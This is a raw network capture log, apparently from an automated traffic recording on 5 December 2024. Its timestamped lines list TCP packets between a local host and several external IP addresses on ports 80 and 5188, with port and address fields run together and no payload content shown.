                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.524965048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.525000095 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.526077032 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.526118040 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.526176929 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.526216030 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.527229071 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.527271032 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.527335882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.527371883 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.528356075 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.528397083 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.528418064 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.528455019 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.529504061 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.529546976 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.529613972 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.529652119 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.530699968 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.530749083 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.530766964 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.530805111 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.531852961 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.531896114 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.531930923 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.531970024 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.533054113 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.533072948 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.533096075 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.533118010 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.534138918 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.534183025 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.534204960 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.534240961 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.535310984 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.535357952 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.535367966 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.535382032 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.535406113 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.535433054 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.535440922 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.535471916 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.536427975 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.536473989 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.536612034 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.536650896 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.537636042 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.537672997 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.537679911 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.537705898 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.538775921 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.538819075 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.538831949 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.538867950 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.539509058 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.539555073 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.539984941 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.540028095 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.540067911 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.540105104 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.541104078 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.541150093 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.541270018 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.541307926 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.541817904 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.541860104 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.541995049 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.542035103 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.542253971 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.542295933 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.543205976 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.543251038 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.543400049 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.543447971 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.543564081 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.543602943 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.544543028 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.544581890 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.544629097 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.544663906 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.545685053 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.545726061 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.546072960 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.546116114 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.546870947 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.546916962 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.546926975 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.546962976 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.548060894 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.548105001 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.548136950 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.548176050 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.549149990 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.549261093 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.549307108 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.550333023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.550378084 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.550539970 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.550578117 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.551487923 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.551532030 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.551975965 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.552018881 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.552615881 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.552661896 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.552730083 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.552767992 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.553787947 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.553833961 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.553956985 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.553993940 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.554930925 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.554972887 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.555134058 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.555174112 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.556086063 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.556127071 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.556135893 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.556159019 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.557250023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.557295084 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.557322979 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.557362080 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.584088087 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.584418058 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.584460020 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.584703922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.584980965 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.585633993 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.585815907 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.586030960 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.586132050 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.586988926 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.587085009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.587121010 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.588077068 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.588233948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.588269949 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.589240074 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.590409040 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.590423107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.590526104 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.590560913 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.590560913 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.591620922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.591634035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.591710091 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.592693090 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.592854977 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.593842030 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.593853951 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.593859911 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.594732046 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.594980955 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.595987082 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.596044064 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.596127033 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.596138954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.596401930 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.597218037 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.597400904 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.597462893 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.598412991 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.598695993 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.598912954 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.599517107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.599754095 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.600610018 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.600651026 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.601028919 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.601711988 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.601732969 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.602598906 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.602989912 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.603003025 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.603054047 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.603054047 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.604020119 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.604629040 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.605151892 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.605484009 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.605493069 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.606360912 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.606373072 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.606379032 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.606728077 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.607450008 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.607528925 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.607589960 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.608547926 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.608761072 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.608896971 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.608908892 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.608985901 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.608985901 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.609051943 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.609914064 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.609926939 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.610735893 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.610897064 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.611093044 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.611344099 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.612015009 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.612139940 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.613116026 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.613199949 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.613212109 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.613224983 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.613262892 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.613271952 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.613467932 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.614250898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.614373922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.614389896 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.615382910 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.615432978 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.615803003 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.616559982 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.616961002 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.617002010 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.617002010 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.735634089 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.736252069 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.736264944 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.736411095 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.736644983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.739335060 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.856415033 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.856432915 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.856504917 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.860204935 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.860219002 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.860405922 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976202965 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976233006 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976250887 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976262093 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976274014 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976284981 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976296902 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976301908 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976309061 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976320982 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976334095 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976346016 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976352930 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976356983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976368904 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976376057 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976381063 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976393938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976406097 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976460934 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976460934 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976573944 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976587057 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976598024 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976618052 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976629019 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976638079 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976639986 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976653099 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976665020 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976681948 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976699114 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976722002 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.976752043 CET51884979292.255.85.66192.168.2.11
